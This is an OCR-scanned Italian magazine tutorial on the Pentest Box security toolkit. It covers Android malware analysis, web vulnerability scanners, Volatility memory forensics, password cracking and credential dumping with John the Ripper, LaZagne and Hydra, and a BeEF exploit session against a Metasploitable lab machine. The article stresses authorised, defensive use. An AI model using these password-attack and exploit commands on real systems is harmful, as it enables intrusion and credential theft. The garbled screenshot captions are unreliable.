ricostruire la natura dell'applicazione 
da esaminare. È a questo punto che 


entra in gioco Apktool, uno strumen¬ 
to per decomprimere correttamente 
i pacchetti di installazione Android 
che permette anche di ricostruire il 
pacchetto di installazione originale. 
Per utilizzare Apktool dobbiamo esse¬ 
re nella sua directory di lavoro cd C:\ 
PenetrationTesting\PentestBox\bin\ 
androidsecurity\apktool ed eseguire 
il comando apktool d applicazione- 
DaAnalizzare.apk che decomprime 
la struttura dell'applicazione.Tutte le 
analisi sul comportamento delle app 
presentate precedentemente sono 
statiche, nel senso che il codice viene 
esaminato senza lanciarne l'esecuzio¬ 
ne. Con Introspy, la categoria di stru¬ 
menti dedicati alla sicurezza Android 
(ma anche iOS) si arricchisce di un tool 
che, installato sullo smartphone da 
controllare, genera la traccia naviga¬ 
bile (in HTML) di tutte lo operazioni 
effettuate dal dispositivo durante l'ese¬ 
cuzione di un programma. Analizzan¬ 
do il report, poi, è possibile ricostruire 
il comportamento reale dell'app per 
capire presenta minacce di sicurezza. ► 



Androguard offre anche un'interfaccia grafica. 
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Una volta in esecuzione, la Box si presenta 
come un "command prompt” avanzato che 
accetta sia i classici comandi DOS, sia i co¬ 
mandi Linux. Per controllare più operazioni 
contemporaneamente, è possibile aprire 
molteplici tab (Ctrl+T) che sono controllati 
dall’emulatore incorporato nella piattaforma, 
ConEmu (http://conemu.github.io). 

Solo audit autorizzati! 

Prima di iniziare le prove con la Pentest Box, 


è importante ricordare che gli strumenti per 
il penetration test devono essere utilizzati 
in maniera lecita e che una sessione di si¬ 
curezza di questo tipo deve essere eseguita 
verso macchine nostre o, altrimenti, solo 
se siamo autorizzati ad agire sui computer 
altrui. Infatti, utilizzare gli strumenti del 
penetration tester senza diritti o autoriz¬ 
zazione è un reato. Se scoprire una falla di 
sicurezza può ancora essere considerata 
un’operazione innocente (ma questo dipen¬ 


de dalla tecnica adottata), sicuramente non 
lo è sfruttare la falla per prendere il controllo 
di un sistema non nostro o che non ci ha 
autorizzato a lanciare il test. Infatti, lo sco¬ 
po principale di questo articolo è quello di 
prendere consapevolezza dei pericoli e degli 
strumenti che il penetration test ci offre per 
difenderci. Vedremo una carrellata di stru¬ 
menti e ne metteremo in pratica alcuni: gli 
altri li svilupperemo sui prossimi numeri di 
Win Magazine. 


L’apk che nasconde il malware 

Android può installare anche pacchetti scaricati dal Web e questi possono nascondere dei virus. Vediamo 
insieme come controllare la natura di un’app Android con gii strumenti di Pentest Box. 


x 

C: \Penet rationTestinc\Pente»tDoxVbin\android»ecuritySandrofua 
ls 

CMANGI LOG ondroapfclnfo.py andrtx i1gn.py ondrogext.py an 

LitlK.L*2.0 androarti.py «rvJrodd.py arutracuard in 

Makrfile aiuliuauto.py aiidrudiff .py widrugui.py an 

KLAUML.txt imlnMnl.py andrwiii.py ondrolyxr.py an 

C : \Pctietrut ionie!»! i»q'\l*enleitBax\tiin\.nidroidjviurity\«md*t}f’u»il 
S Python ur»tlru«ipkiufu.py i vuvpect.opk 
ttispcct.jpk : 

HifcS: 

MfclA iHh/MANUfct»! .t* Ubknuwn 4<H4f20i 
META 1M7SH1V1.M- UnknoNn blbcAi/O 
META 1NF/SMIY1.RSA Unknown 77df883f 
rcs/«jnim/ilidc_in_up.wol Unknown ledf©136 
rcs/ania/slidc_oat_down.xml Unknown 7GS27Sb 
r«s/drawable/bitaap_backgPOund.xjal Unknown -2231c88f 
r«s/drawable/bit»ap_scroll.xiBl Unknown -cd3a!8f 


-x Esaminiamo l’app mobile 
sospetta 

La prima operazione da fare su un .apk 
sospetto, è esaminarne il contenuto. Portiamo¬ 
ci nella directory di lavoro con cd path_Box\bin\ 
androidsecurity\androguard e avviamo l’anali¬ 
si del pacchetto con python androapkinfo.py -i 
path_del_file_sospetto.apk. 

I . .. . tubuli, i ... I Uurtt ,1. 1... v .. . .Ut*. .... .J 



^ Analizziamo il reoort 

^ Completata la scansione, troveremo un 
report in formato HTML molto dettagliato 
all’Interno della cartella path_Box\bin\androidse- 
curity\androwarn\report. Avviamo con il browser 
il file HTML che porta II nome del programma e 
autorizziamo il componente ActiveX per visualiz¬ 
zarlo. 


REQUESTED PERMISSIONS: 

android. pernii $ * ion. ALL fcb!>_Wl E 1_S IAI fc 
Andro t d. pr rw 1 s s i on. f HANfiF _W I r T_ST ATF 
andrò id. pe ro» i s s ion. B L U£ TOOTH 
android.perniission.BLUEtUOIH AUMIN 
Android.prrmission.WRTTT APN SFTTtNf.S 
android.perniisi,ion.READ_SYNC_SETTIMGS 
android. penai ss ion. WK1 Ifc SYNL ^fclllNbb 
andrò! d. pernii s s i on. (ÌFT_Af f Ot JNTS 
android.permissiofi.VIBRATE 
android. pernii ss ion. HASHL IGNI 
nndmid. pormi s , ;ion.HARr)WARF_TFVr 
android.pernii ss ion.WRITE_SECURE_SETTIN6S 
android.permission.KkAU SfcLURfc bblllNGS 
android.pormi ssion.CAMERA 
* dmJroid.ptnniiiiun.HOOIFV_PHOHE_SWE 


^ Questi permessi sono eccessivi 

2 Una stima della sicurezza dell’app si ha 
controllandone i permessi. Scorriamo per 
cercare la sezione REQUESTED PERMISSIONE, 
i quali, nel caso in oggetto, appaiono eccessivi: 
l’amministrazione del Bluetooth, la connessione 
alla rete, i task in esecuzione e l’accesso alla foto¬ 
camera. 



^ Attenti alle richieste 
sospette - 

Esaminiamo ANALISYS RESULTS e i detta¬ 
gli in Telephony Identifiers Leakage. Scopriamo che 
l’IMEI del cellulare e il seriale della SIM sono a disposi¬ 
zione dell’applicazione. Nella sezione ANDROIDMANI- 
FEST.XML c’è anche una traccia del malware: l’attività 
smart.McbainServicce. 


C . \Penr Irai iunTei» tinyXPentestBoxXbifAisndruidset uri ty’ 
S python androwarn.py *i virusesAPKX *v 3 -r htnl 
Uropbox-23GB.apk com. j 

fctecsaUroyd_2U13.ag com.) 

ktecsaUroyd ZUli.apk i(.al« 

GSearch-1.1.1 com.gsz.ownpack-1.apk »usp« 

IQAgent.apk xiao: 

com.VoiceChange.VoiceChanRell-l.d.apk xiao! 

C: \Pcnrtrnt InnTrst ing\Pfntr*;tBox\bÌn\»v»droldspr uri ty* 
< python nndrnwnm.py i vimsesAPKViuspcrtAPK.npk \ 
[FRROR] Thr rhilk.it mndulo fs nnt installi^ ynti idi] 
[ERRORI Con not rcod thè certificotc fCTA IHF/SHIYl.f 
[♦J Analysis successtully compieteti and HTML file ref 

C : \Penet rat iunTesting\PentestBux\birAamJroitisecurity’ 


^ Tanti utili strumenti 

Approfondiamo l’analisi dell’app utilizzan¬ 
do il tool Androwarn. Digitiamo quindi cd 
path_Box\bin\androidsecurity\androwarn e uti¬ 
lizziamolo per una scansione approfondita del file 
sospetto con python androwarn.py -i path_del_ 
file_sospetto.apk -v 3 -r html generando un 
report HTML. 


9. viri 

jstotal 

SHA 256 

6 cb 40 a*dct 054 tt 907 ff 83 btt 91 1 « 1 daf 20 * 4 a 69 #a 53 aSc< 

Fila noma 

F 706 G 4 BB 0045 C& 5 C 7 SeA 9113 C 5 C 400 T 4 «pi 

Oatoctton ratto 

99 /SS 

Anafyste dato 

2015 05 07 02 53 55 l/TC ( 1 monih 2 vweks ago ) 

■ Analysb Q 

Ri* octad X Rolabonirvos O Addbonal mlormaitor 


^ La verifica finale 

Una semplice ricerca su Google della 
stringa smart.McbainServicce ci resti¬ 
tuisce molte segnalazioni. Tra queste, troviamo 
anche le pagine di VirusTotal, con una positivi¬ 
tà segnalata da 39 dei 55 antivirus utilizzati, e 
Symantec confermano il malware. Pericolo infe¬ 
zione scampato? 
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ANALIZZIAMO LE VULNERABILITÀ CHE SI NASCONDONO NEI SITI WEB 


Le scansioni di sicurezza dei siti Internet sono uno strumento indispen¬ 
sabile per i webmaster, ma anche per gli appassionati che curano un 
piccolo blog. Nella lotta contro i pirati informatici, utilizziamo i loro stessi 
strumenti per rilevare problemi, falle di sicurezza e altre informazioni che 
non dovrebbero finire in mano a malintenzionati. La Pentest Box offre Burp, 
che è una suite completa da utilizzare per analizzare un nostro sito con lo 
scopo di migliorarne la sicurezza. Per utilizzare Burp, dobbiamo avviarlo 
con il comando burp e poi far puntare la navigazione del browser al suo 
server proxy interno. Se utilizziamo Internet Explorer, apriamo le Opzioni 
Internet, selezioniamo il tab Connessioni e Impostazioni LAN e spuntiamo 
Server Proxy con indirizzo 127.0.0.1 e porta 8080. Quando navighiamo dal 
nostro browser, Burp registra tutte le nostre azioni e le risposte del sito, ne 
ricostruisce la struttura e può lanciare attacchi alla ricerca di vulnerabilità. 
Proprio per questo motivo è importante utilizzare Burp su un nostro sito o 
su un dominio per il quale siamo autorizzati a lanciare le prove di sicurezza. 



UNO SCANNER SEMPLICE DA USARE 

Per i più smanettoni, Golismero offre all'utente un ambiente a riga di co¬ 
mando che può essere utilizzato per eseguire audit di sicurezza su bersagli 
Web. Una scansione veloce può essere lanciata portandosi nella directory 
di lavoro del programma con il comando golismero e poi avviando il tool 
con golismero.bat SCAN sitoDaAnalizzare. Le scansioni effettuate da 
Golismero possono essere anche mirate a minacce specifiche, ma, in questo 
caso, tutti i parametri devono essere specificati su riga di comando.Tornando 
alle interfacce grafiche per gli audit di sicurezza Web, segnaliamo Vega che 
è, forse, uno degli scanner più semplici da utilizzare. Una volta nella sua 
directory di lavoro, basta digitare vega.exe e configurare il bersaglio della 
scansione per ottenere, velocemente, un report sulla sicurezza del sito. 


SIMULIAMO UN ATTACCO 

Una tecnica di attacco molto utilizzata dai pirati informatici è l'SQL in- 
jection che consiste nell'iniettare, letteralmente, del codice malevolo 
all'interno di un'interrogazione ad un database, per scoprire informazioni 
sensibili come account e password o per assumere un ruolo privilegiato. 
JSQL (http://sqlmap.org), SqlMap e Vega sono alcuni degli strumenti spe¬ 
cifici per il controllo deil'SQL offerti dalla Box, ma anche gli altri scanner 
che abbiamo presentato offrono questo tipo di controlli. La Pentest Box 
offre anche altri scanner e crawler per la sicurezza Web: tra questi citiamo 
velocemente W3af, Yasuo, Paros e DirBuster, Zap e Commix. 

nx a cmd.exg [ 


See README for further inforaation. 

No argument suppiied 

c:\PenetrationTesting\PentestOox 
> wpscan --uri https://peppworld.wordpress.coa 

V\ / / _ \ / i 

\ \ /\ / /I l_> I (_ __ 

\ \/ \/ / I _/ \_\ / _l/ _• I \ 

\ /\ / il _) i <_i uni 

\/ \/ Il i / \ i\ . i i i 


METTIAMO IL BLOG WORDPRESS SOTTOCHIAVE 

Molti siti realizzati con WordPress, sono su server personali che non vengono 
aggiornati e rappresentano una minaccia di sicurezza a causa di note vul¬ 
nerabilità delle vecchie versioni. Per controllare se il nostro sito sia affetto 
da problemi, possiamo utilizzare WPscan, l'utilità a riga di comando che 
verifica la presenza di falle di sicurezza e codice obsoleto. WPscan effet¬ 
tua analisi non intrusive, ma anche attacchi a forza bruta, cioè tantissimi 
tentativi di accesso, sull'account admin con una lista di password. Per 
usare lo strumento, non è necessario essere in una directory specifica ma 
basta scrivere wpscan -uri sitoDaAnalizzare e premere Invio. Un altro 
scanner per vulnerabilità dotato di interfaccia grafica è IronWasp. Questo 
strumento si avvia digitando il comando ironwasp seguito da Invio. Una 
volta avviato l'ambiente, possiamo configurare il browser per puntare al 
suo proxy, come per Burp, ma è anche possibile utilizzare il tab Console per 
indicare direttamente l'indirizzo del sito da analizzare. Dopo aver regolato 
diversi parametri di scansione, il nostro sito viene analizzato e le possibili 
minacce sono evidenziate. 


I TOOL DELL'INFORMATICA FORENSE USATI DAGLI INVESTIGATORI 


Tutti i recenti casi di cronaca nera hanno coinvolto gli 
esperti di informatica forense che, analizzando log, file 
cancellati, temporanei e altre tracce di attività sui PC 
degli indiziati, contribuiscono a costruire o a demolire 
gli impianti accusatori. Non tutti sanno, ad esempio, 
che unfile cancellato non viene fisicamente rimosso dal 
disco rigido del nostro computer, se non con un'even¬ 
tuale riscrittura e che può essere ricostruito facilmente. 
Nel settore dell'informatica forense, la Pentest Box offre 
strumenti per l'analisi del file System, della memoria 
RAM del PC o tool più specifici per l'analisi dei browser 
e delle attività degli utenti. 

• Autopsy è dotata di interfaccia grafica e integra 
diversi strumenti per investigare su cosa è successo 


ad un PC ed è anche in grado di recuperare foto 
perse dalle memory card. 

Volatility è una collezione di script in Python che 
permettono l'analisi della memoria volatile di un 
computer. 

Dumpzilla si utilizzata per analizzare l'attività di di¬ 
versi browser e può farci capire quali tracce lasciamo 
sul nostro sistema con la nostra attività Web. Può 
fare ricerche mirate sulla cache, sui download, su 
tutta la cronologia, sui form compilati e su tutto ciò 
che il browser registra della nostra navigazione. 
Make-pdf-javascript e make-pdf-embedded 
servono per inserire un codice javascript (che viene 
eseguito all'apertura del documento) all'interno di 


un file PDF. La risposta a questo tipo di pericoli, che 
possono derivare da un "innocente" PDF allegato 
ad un'e-mail, sono gli analizzatori come Origami, 
PeePDF e PDFparser. 
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Andiamo a sbirciare tra le pieghe 

Vediamo come utilizzare il tool Volatility, messo a disposizione sempre da Pentest Box, per analizzare un’immagine della 


| B v«l«ifcy-ot | 


t : \l*cnctration!e!*ling\Pefilc*stBox\bin\Foii!fisic !uols\v 

S volatility -t cridex.vmem imagointo 

Volatility Foundation Volatility 

Framework 2.4 

Detnrmininp, profila baveri no KOfif. *parrh... 

Suggested Protile(s) : 

WinXPSP2x86, WinXP< 

AS Layerl : 

IA32PagedMe«oryPae 

as i aycc2 : 

Fi loAddro*.*; Sparo (( 

tridox.vmom) 


PAE type : 

PAE 

0TB : 

0x2fe000L 

KDFKi : 

HxKHS4Sao«l 


li... I 


C: \PenetrationTeiting\PcnteotBox\bin\Foren 5 lcTools\voL 
$ volatility f cridcx.vmcm connscan 
Volatility Foundation Volatility Fromcwork 2.4 
Offvvt(P) Locai Addrt*** K emù te Atldress 


0x02087620 172.16.112.128:1038 41.168.5.140:8080 | 

OxO23a8O08 172.16.112.128:1037 125.19.103.198:801 

C:\Ppni»trat innTr»vtin{j\Pont«»*tBox\hin\Fnrpn«(irTool*\volj 


[ 1 rmd»i» 


-1 

C:\PenetrationTesting\PentestBox\bin\r orensicTools 
$ volatility -f cridex.vmem pslist 

Vol.it il il y Fourui.it i imi Vol.it ility 

Fr.irai-work 2.4 

Offset(V) Name 

PIO 

PPIO Th. 

0x823c89c8 System 

4 

0 

0x822+1020 muss.oxo 

368 

4 

0x822a0S98 csrss.exe 

584 

368 

0x82298700 winloBtxi.exe 

608 

368 ; 

0x81e2ab28 services.exe 

652 

608 

0x81o2a3b8 lsass.exe 

6M 

608 

(IvOUIUCfl cuchncf ava 

0->A 

«i h 


^ Informazioni di base 

La prima cosa da fare sull'immagine della 
RAM è ottenerne le informazioni principali. 
Nella directory di lavoro del tool (cdpath_Box\bin\ 
ForensicToolsWolatilit j/), il comando da utilizza¬ 
re è volatility.exe -f path_del_dump imageinfo. 


^ Lo stato delle connessioni 

2 Per conoscere lo stato delle connessio¬ 
ni attive al momento della generazione. 
Avviamo l'analisi del pacchetto con volatility.exe 
-f path_del_dump connscan per leggere a video 
i dati relativi alla configurazione della rete. 


I processi in esecuzione 

Tale lista si ottiene con volatility.exe -f 
path_det_dump pstistv'ma\\zza\a in una 
tabella dei processi con identificativi e numero di 
thread. Per rilevare i processi nascosti, si utilizza 
volatility.exe -f path_del_dump psscan. 


ATTACCO ALLE PASSWORD: 
QUANDO IL PUNTO DEBOLE SIAMO 

Spesso il problema di sicurezza dei o troppo comuni è una delle cause 
nostri sistemi siamo proprio noi: la più diffuse di facile accesso ai siste- 
scelta di password troppo semplici mi. In alcuni casi fortunati, i siti sui 


CorefTP not installed 

WinSCP posswords 
winSCP not Installed. 

................... rhriHW pwsswurtls--- 

Google Chroae not installed. 

Firctox passwords 
[I] No passwords found 

................... 0|M*r4 [MSSMinls ------------- 

Opera is not installed. 

Internet Explorer passwords 

Password found 111 

U>«m«Bw: •e.-la^ia^r^ ft 
Password : al f «Par ai* 

Site: https://login.libero.it/ 

-....-..... Tortolse passwords ••—-- 

lortois© not installad. 

................... DbvI suvli zwr pwvvwurdv ---« — 

Obvisualizer not installed. 

-... Squirrel passwords -- 

squirrel not installed 

--- SQL Dwvvlopvr passwords - 

SOL Oeveloper not installed. 

- Dot Net Passport passwords 

No credentials listed with thè enua cred function 



Grazie ad un tool come Lazagne possiamo recuperare un poco tempo una password 
salvata dal browser. 



quali ci registriamo e alcuni 
sistemi operativi effettuano 
un controllo delle password e 
ci impongono scelte non ba¬ 
nali. Quando questo meccani- 
smo non viene utilizzato, la nostra 
parola segreta è spesso qualcosa di 
breve, noto o non tanto difficile da 
indovinare. La Pentest Box ci offre gli 
strumenti per verificare la sicurezza 
delle nostre password e metterci 
nei panni di un hacker che utilizza 
un dizionario di parole chiave per 
entrare, in modo fraudolento, nel 
nostro sistema. 


CONTROLLI AVANZATI 

Non si tratta, indubbiamente, di 
strumenti facili da utilizzare: siamo 
di fronte a utility a riga di coman¬ 
do che spesso richiedono anche la 
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della memoria RAM del computer 

memoria di un PC catturata tramite RamCapturer. Scopriremo, così, eventuali strani malfunzionamenti del sistema. 


!■ == ~~I 


i volatility -f cridex.vnen 

modules 

icTooli 

Volatility foundation Volati 

Llity rramework 

2.4 

Offset (V) Nane 

Base 

< 

0x823fc3b0 ntoskml.exe 

Ox8O4d7000 

exiff 

0x823fc338 hai.dii 

OxKtXxfc***) 

0x2< 

Ox823fc2eO kdcon.dll 

0xf8b9a0G0 

Oxà 

0x823fc2/0 HOOIVlD.dll 

0xf8aaa0W 

0x 

0x823f<208 ATPI.'.y. 

0xt8S«>flG0 

Ox?( 

0x823fc198 WtlLIO.SYS 

0xf8t>9c«X) 

0Xa 

0x823lcl30 pci.sys 

0xf855a006 

0x11 

AvO)lfrArA Icannn cuc 

<w*o cnvw» 

Av: 


^ Analisi dei driver 

^ Per ricostruire lo stato di tutti i moduli (in 
genere driver o DLL) caricati dal PC quan¬ 
do è stata generata l’immagine della memoria, 
utilizaimo il comando volatility.exe -fpath_del_ 
dump modules che visualizza anche il percorso 
delle librerie trovate. 


1 U rmd m |\ 

C:\PenetrationTesting\P< 

;ntest8ox\bin\ForensicToo 

$ volatility -f cridex.i 

/raeti envars 

Volatility Foundation Volatility Franework 2.4 

Pid Process 

Block Variabl 

368 smss.exe 

0x00100000 CumaunP 

368 smss.exe 

0X00100000 Patii 

368 smss.exe 

0x00100000 Program 

368 smss.exe 

0x00100000 SystemD 

368 smss.exe 

0x00100000 System!) 

SRA rcrcs pyp 

ftvftflltwnf» CnmWr 


^ Variabili d’ambiente 

Per conoscere il valore delle variabili di 
ambiente è necessario utilizzare il coman¬ 
do volatility.exe -f path_del_dump envars. Tra 
questi dati troviamo anche alcune informazioni che 
riguardano la classe del processore e l’architet¬ 
tura del PC. 


I Q onde* 

-1 

J volatility f cridcx.vncn svcscan 

orcnsicTool- 

Volatility Foundation Volatility Fraw 
Offset: 0x381e90 

Order: 1 

Start: S£RVICE_DISA8LED 

Process ID: - 
Service Nane: Abiosdsk 

Display Nane: Abiosdsk 

Service Type: SERVICCJfCRNE LORIVER 
Servire State: SI KVIUSKUVII) 

?work 2.3 

^ \ Processi e servizi 



Un'attenta analisi del dump della memo¬ 
ria può fornire anche dati utili sulla lista dei 
processi che sono installati sul PC. Con volatility. 
exe -f path_del_dump svcscan è possibile otte¬ 
nere dettagli sui servizi: nome, tipologia e lo stato 
all’atto del dump. 


conoscenza della crittografia, ma 
è importante approfondire un po' 




*ni 


questi tool per difenderci meglio e 
per essere più consapevoli dei rischi 
che corriamo quando scegliamo 
una parola segreta troppo semplice. 
• JohnTheRipper è un noto pro¬ 
gramma Linux che viene utilizza¬ 
to per recuperare una password 
di accesso smarrita. Le password 
dei sistemi Linux sono conser¬ 
vate nel file le tc/passwd, ma 
sono criptate e quindi non 
leggibili. Con il comando john 
--wordlist=password.lst -rules 
passwd recuperiamo le password 
memorizzate da Linux, 
con john --show pas¬ 
swd le visualizziamo. 

• CryptoHaze è un tool 
per attacchi di tipo forza 
bruta. Lo strumento uti¬ 
lizza la CPU multicore delle 
schede grafiche NVIDIA per 


ridurre il tempo necessario a de¬ 
cifrare la parola segreta. 
LaZagne è un tool per recupe¬ 
rare tutte le password che sono 
conservate nel nostro PC. Il pro¬ 
gramma viene eseguito da riga 
di comando e supporta diversi 
ambiti di rilevamento che vanno 
dal sistema operativo, fino ai ser¬ 
vizi remoti come chat ed e-mail e 
deve essere avviato, con i privilegi 
di amministratore, una volta rag¬ 
giunta la sua directory di lavoro 
con cd C:\PenetrationTesting\ 
PentestBox\bin\password_at- 
tacks\LaZagne\Windows. Usan¬ 
do LaZagne, possiamo renderci 
conto del pericolo causato da un 
sistema compromesso e delle in¬ 
formazioni che possiamo fornire, 
involontariamente, ad un hacker. 
Patator è tra gli strumenti più 


completi per effettuare attacchi 
di forza bruta alle password, ma 
offre solo un'interfaccia a linea di 
comando. Con Patator è possibile 
mettere alla prova la sicurezza di 
servizi FTP, SSPIJelnet, SMTP, POP 
e IMAP (i servizi di posta elettro¬ 
nica), VNC (controllo remoto), o 
cercare di forzare la login di da¬ 
tabase come MSSQL, MySQL e 
Postgre. 

THC Hydra Windows è un altro 
strumento per attaccare servizi 
con autenticazione basata su 
login utente e password. Il pro¬ 
gramma legge le login e le pas¬ 
sword da due file che riceve dal¬ 
la riga di comando al momento 
dell'invocazione e può attaccare 
uno o più bersagli leggendone 
l'indirizzo in un terzo file di con¬ 
figurazione. 



1 L3T hydfl.tx» (Adnwi) 

■ rmdna 


• • - *1 


•sting\Pentest8ox\bln\password attack*\thc-hydra-«indo«* («aster) 



9 livdi'rf -1 «col 
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(WARNING] Hjny 
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M t 4 

[DATA] «AV h tA 
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[DAIA] attaeklng Service ssh on porr ìf 



1 of 1 terger c 
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S 

eHing\P«nt«vt8ox\bin\panword_attack*\thc-hydra-«indcw* («uitvr) 



|- 1 
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■ THC Hydra utilizza un elenco di password per ottenere l'accesso alla Shell di comando del sistema operativo vittima di un attacco. 
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Fai da te | Così entro nel tuo PC 



I TRUCCHI 
DEGLI ESPERTI 

Sempre più spesso, per 
portare a termine con 
successo i loro attacchi, 
i pirati informatici 
utilizzano tecniche di in¬ 
gegneria sociale per co¬ 
struirsi un'identità falsa 
ma credibile da utilizzare 
per ingannare gli utenti 
del Web. Social Engineer 
Toolkit è lo strumento of¬ 
ferto dalla Pentest Box a 
questo scopo. SET può ef¬ 
fettuare phishing (invio 
di e-mail fraudolente a 
nome di servizi noti), ma 
soprattutto generare ed 
allegare moltissimi tipi 
di malware alle e-mail. 
Anche in questo caso ci è 
d'obbligo ricordare che 
queste sono pratiche 
illegali. SET dispone 
anche di un generatore 
di codice infetto per 
Arduino che sfrutta la 
nota schedina per attac¬ 
care i sistemi a cui viene 
connessa. 

VITTIME 
SOTTO STRESS 

La tecnica nota come 
Stress Testing è una 
verifica di come un 
sistema reagisce a 
possibili sovraccarichi 
dovuti a troppe richieste 
da servire. La pratica di 
attacco che si vuole si¬ 
mulare è nota come DoS 
oDenialof Service (let¬ 
teralmente negazione 
del servizio). Per causare 
un DoS, gli hacker, che 
controllano centinaia di 
server insicuri, li utiliz¬ 
zano per inviare migliaia 
di richieste ad un singolo 
bersaglio, con il risultato 
di sovraccaricare il ser¬ 
ver e di renderlo inatti¬ 
vo. Gli stessi strumenti 
possono essere utilizzati 
per verificare quanto un 
nostro server sia esposto 
al DoS. La Pentest Box 
offre diversi programmi 
utili allo scopo tra questi 
citiamo Ethercap, Wire- 
shark, ma anche Burp, di 
cui abbiamo parlato in 
precedenza. 


Scoviamo i bug di Windows 

I tool della Pentest Box sono gli stessi utilizzati dai pirati informatici per scopi illeciti: utilizziamoli, 
quindi, solo su macchine nostre. Ecco come provarli senza fare danni. 


- Start Ing àrierrré rirrutlo* irkrAalcr •(* I OR 1 

• Stirtlnf pariod le commtmé tcktdiltr croad I OR I 

• Stari Ih» Toaiat serviti en«t*e tuaial*» S I OR I 

• Start I ng vrb (trarr HNM I OR I 
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^ Prepariamo il bersaglio 

Come bersaglio per i nostri test di sicurezza possiamo usa¬ 
re la distribuzione Linux Metasploitable: scarichiamola da 
www.winmagazine.it/link/3222 sotto forma di archivio compresso. 
Nel file ZIP troveremo diversi file corrispondenti ai dischi rìgidi virtuali 
che useremo per creare la macchina virtuale bersaglio. 


^ Avviamo la macchina virtuale 

Per utilizzare la Metasplotable, scarichiamo ed installiamo 
VirtualBox (www.virtualbox.org/wiki/Downloads), che è un 
software per gestire macchine virtuali: creiamo una Nuova mac¬ 
china Linux ed assegniamole, dopo aver decompresso il pacchet¬ 
to Metasploitable, il file Metasploitable. vmdk come disco rigido. 


3 <4 □ P * GB 

New Scan Commina wizard Save Scan Open Scan fteport a oug Help 
Interi'.!» Scan on ir arimi» nmap org 171 67 77 1100 0 IO wap yuma net ramo? yiimajief M | 

Target fi wap yuma net r.vrtn? yuma net j v | proni*- Intrn'.e Scan | v j [ SCbn| 

Communi! um«p T Ayyi w\ivv -A «ianmw.nmap.org 171.67.72.3 10.0.0.10 wap.yuma.nwt i uiduj.yum. 


HoHi | Svfvkca Poitt/ 
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rpcPina 


Nmap Output Hovt DuUill*. Scan Petali’, 


</ icanmw.nmap.org 20S 
4 wap yuma nel 1«I7 161- 80 tep 


[porr I Protocol [state | servar produci 

> 90 tep opwn Apacnw nttpa 


open tinnivi WKl*>4(.i wirwil 



-à. Iniziamo l’attacco 

Scelto un bersaglio da conquistare, possiamo iniziare la 
nostra sessione di penetration test. Scopriamo innanzitutto 
IIP che VirtualBox ha assegnato alla macchina virtuale Metasploi¬ 
table: effettuiamo una scansione della rete con Zenmap mediante 
il comando zenmap sugli indirizzi della rete locale. 



Authenbcation 


Usemame: 

Password: 

Logm 


^ Un tool adatto allo scono 

^ Per iniziare ad analizzare la configurazione di sicurezza della 
Metasploitable, usiamo Beef, un tool che sfrutta il browser 
Web per attaccare la sicurezza di un sistema bersaglio. Portiamoci 
nella directory di Beef con cd C:\PenetrationTesting\PentestBox\ 
bin, configuriamolo con bundle instali e avviamolo con rubybeef. 


Module Tre* 

Metasplolt 
é ^Metasploit (579) 

Firefox 5 0 -15 0.1_exposedProps_XCS Code Execution 

Firefox 8f9 AttrixiteChRdPemovedO Use-After-Free 
Firefox Proxy Protoiype Prrviteged JavaScript Injection 
Firefox XMLSeriailzer Use After Free 
Firefox location QuerylnterfaceO Code Execution 
% Firefox nsSVGValue Out-of-Bounds Access ViJnerabtty 
Fox# Peader Plugln UPL Processing Buffer 0 ver fio w 
Mozilla Frefox 3.6.16 mChannel Use-After-Free 
% Mozilla Fwefox Array reducePightO Integer Over fio w 
. Mozilla Firefox Bootstrapped Addon Social Engineering Code Execuoon 
Mozilla Firefox trterleaved document wnte appendChitd Memory Corruption 


^ La trannola è nronta! 

g Puntiamo quindi il browser all'indirizzo 127.0.0.1:3000/ui/ 
authentication , utilizzando beef come Usernamee Pas¬ 
sword. Beef dispone di una serie impressionante di exploit e può 
pubblicare anche delle pagine Web trappola, con l'intento di far ese¬ 
guire codice malevolo ai browser delle vittime e prenderne il controllo. 


^ Attacco in corso 

A questo punto, sicuri di attaccare la macchina virtuale su cui 
è in esecuzione la distribuzione Metasploitable, possiamo con¬ 
tinuare la nostra sessione di penetration test e iniziare a lanciare i vari 
exploit di Beef contro la nostra "vittima”. Per farlo, è sufficiente digitare 
il nome dell’exploit da riga di comando e confermare con Invio. 
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ALTRI STRUMENTI MESSI A DISPOSIZIONE DALLA PENTEST BOX 


La Pentest Box offre anche una nutrita serie di 
utility e ambienti già configurati per le sessioni 
di sicurezza. 

• Atom è un editor di testo che si integra be¬ 
ne con il sistema basato su ambiente a riga 
di comando. Viene visualizzato in modalità 



Atom divide la finestra principale della Box 
con il "prompt dei comandi" per evitare fastidiose 
sovrapposizioni. 


affiancata al "prompt dei comandi" e quindi 
non si sovrappone ad esso. 

Vim è dedicato ai più smanettoni, affezionati agli 
editor "classici" di Linux: si tratta di un editor di 
testo leggero e potente. In questo caso, la finestra 
dell'editor viene però visualizzata a tutto scher¬ 
mo e, per eseguire contemporaneamente altri 
comandi dal prompt, dobbiamo aprire un'altra 
sessione con Ctrl+T o cliccando sull'icona verde 
con il simbolo + sulla barra dei comandi della Box. 

Firefox Portable è un altro strumento della Box 
molto utile, perché già configurato con tutti i tool 
ed i plug-in per l'esperto di sicurezza: disponibile 
nella directory \bin\RrefoxPortable della Box, 
questa versione del famoso browser ha già tutto 
quello che serve per un'analisi profonda delle 
pagine Web e per attivare/disattivare javascript, 
cache, cookie, fogli di stile, proxy di navigazione, 
e offre un pulsante per tutto quello che ci può 
dare un controllo veloce sulla nostra navigazione 



La versione modificata di Firefox Portable, già inclusa 
nella Metasploitable, offre tutto ciò che serve all'hacker. 


C'è da dire, infine che Box riconosce sia comandi 
DOS, sia comandi Linux: per visualizzare il conte¬ 
nuto di una directory, possiamo utilizzare il co¬ 
mando DOS dir, ma possiamo anche utilizzare la 
sua versione alternativa Linux Is. Questi sono solo 
un esempio dei comandi "bilingue" (Windows e 
Linux) della Box. La Pentest associa la semplicità 
d'uso tipica di Windows alla potenza e versatilità 
dei comandi Linux per creare un ambiente usabile, 
ma allo stesso tempo capace di eseguire sessioni di 
penetration test come una qualsiasi distribuzione 
Linux (vedi Distro Alternative in basso). 


LE DISTRIBUZIONI ALTERNATIVE PER TESTARE LA SICUREZZA DEL PC 


Tra gli strumenti più completi per il penetra¬ 
tion test possiamo provare anche le distribu¬ 
zioni Linux Kali (www.kali.org/downloads) 
e BackBox (www.backbox.org/downloads). 
Entrambe sono sia installabili, sia live, cioè ci 
basta inserire il DVD su cui le abbiamo ma¬ 
sterizzate ed avviare il PC per provarle sen¬ 
za effettuare l'installazione, ed entrambe 
sono dotate di tutti gli strumenti degli ha¬ 
cker, organizzati per gruppi di funzionalità. 
La distribuzione Samurai è specifica per il test 
